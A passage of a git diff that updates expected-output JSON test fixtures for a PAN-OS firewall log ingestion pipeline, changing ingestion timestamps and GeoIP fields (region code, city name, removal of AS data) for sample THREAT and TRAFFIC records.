@@ -11604,7 +11194,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079476400Z", + "ingested": "2021-12-14T14:49:56.151609638Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,\"load.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", @@ -11643,22 +11233,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -11745,7 +11330,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079482300Z", + "ingested": "2021-12-14T14:49:56.151610003Z", "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,\"8fe44cb728c0f40750c64ee906eb72.css\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", 
@@ -11784,22 +11369,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -11886,7 +11466,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079488Z", + "ingested": "2021-12-14T14:49:56.151610345Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", @@ -11925,22 +11505,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -12027,7 +11602,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079495700Z", + "ingested": "2021-12-14T14:49:56.151610687Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", @@ -12066,22 +11641,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -12168,7 +11738,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079501900Z", + "ingested": "2021-12-14T14:49:56.151611031Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,\"appcast.xml\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", 
@@ -12207,22 +11777,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -12309,7 +11874,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079507600Z", + "ingested": "2021-12-14T14:49:56.151611376Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", @@ -12348,22 +11913,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -12450,7 +12010,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079513200Z", + "ingested": "2021-12-14T14:49:56.151611723Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", @@ -12489,22 +12049,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -12591,7 +12146,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079519200Z", + "ingested": "2021-12-14T14:49:56.151612067Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,\"index.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", 
@@ -12630,22 +12185,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -12732,7 +12282,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079524900Z", + "ingested": "2021-12-14T14:49:56.151612420Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", @@ -12757,22 +12307,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -12873,7 +12418,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079531Z", + "ingested": "2021-12-14T14:49:56.151612873Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", @@ -12912,22 +12457,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -13014,7 +12554,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079536600Z", + "ingested": "2021-12-14T14:49:56.151613219Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", 
@@ -13053,22 +12593,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -13155,7 +12690,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079542200Z", + "ingested": "2021-12-14T14:49:56.151613574Z", "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", @@ -13180,22 +12715,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -13296,7 +12826,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079547800Z", + "ingested": "2021-12-14T14:49:56.151613934Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:44:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -13335,22 +12865,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -13437,7 +12962,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079553600Z", + "ingested": "2021-12-14T14:49:56.151614278Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", 
@@ -13476,22 +13001,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -13578,7 +13098,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079559200Z", + "ingested": "2021-12-14T14:49:56.151614639Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -13617,22 +13137,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -13719,7 +13234,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079565Z", + "ingested": "2021-12-14T14:49:56.151614982Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -13758,22 +13273,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -13860,7 +13370,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079568400Z", + "ingested": "2021-12-14T14:49:56.151615335Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", 
@@ -13899,22 +13409,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -14001,7 +13506,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079572800Z", + "ingested": "2021-12-14T14:49:56.151615766Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,\"ga.js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -14040,22 +13545,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -14142,7 +13642,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079577900Z", + "ingested": "2021-12-14T14:49:56.151616113Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json index 50d42fec91c..46411eb7dad 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json @@ -5,26 +5,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -120,7 +115,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381640800Z", + "ingested": "2021-12-14T14:50:18.748391287Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -145,26 +140,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -260,7 +250,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381649400Z", + "ingested": "2021-12-14T14:50:18.748393940Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", 
@@ -285,26 +275,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -400,7 +385,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381653100Z", + "ingested": "2021-12-14T14:50:18.748394423Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -425,26 +410,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -540,7 +520,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381657700Z", + "ingested": "2021-12-14T14:50:18.748394768Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -565,26 +545,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -680,7 +655,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381663400Z", + "ingested": "2021-12-14T14:50:18.748395133Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", 
@@ -705,26 +680,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -820,7 +790,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381668800Z", + "ingested": "2021-12-14T14:50:18.748395558Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -845,26 +815,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": 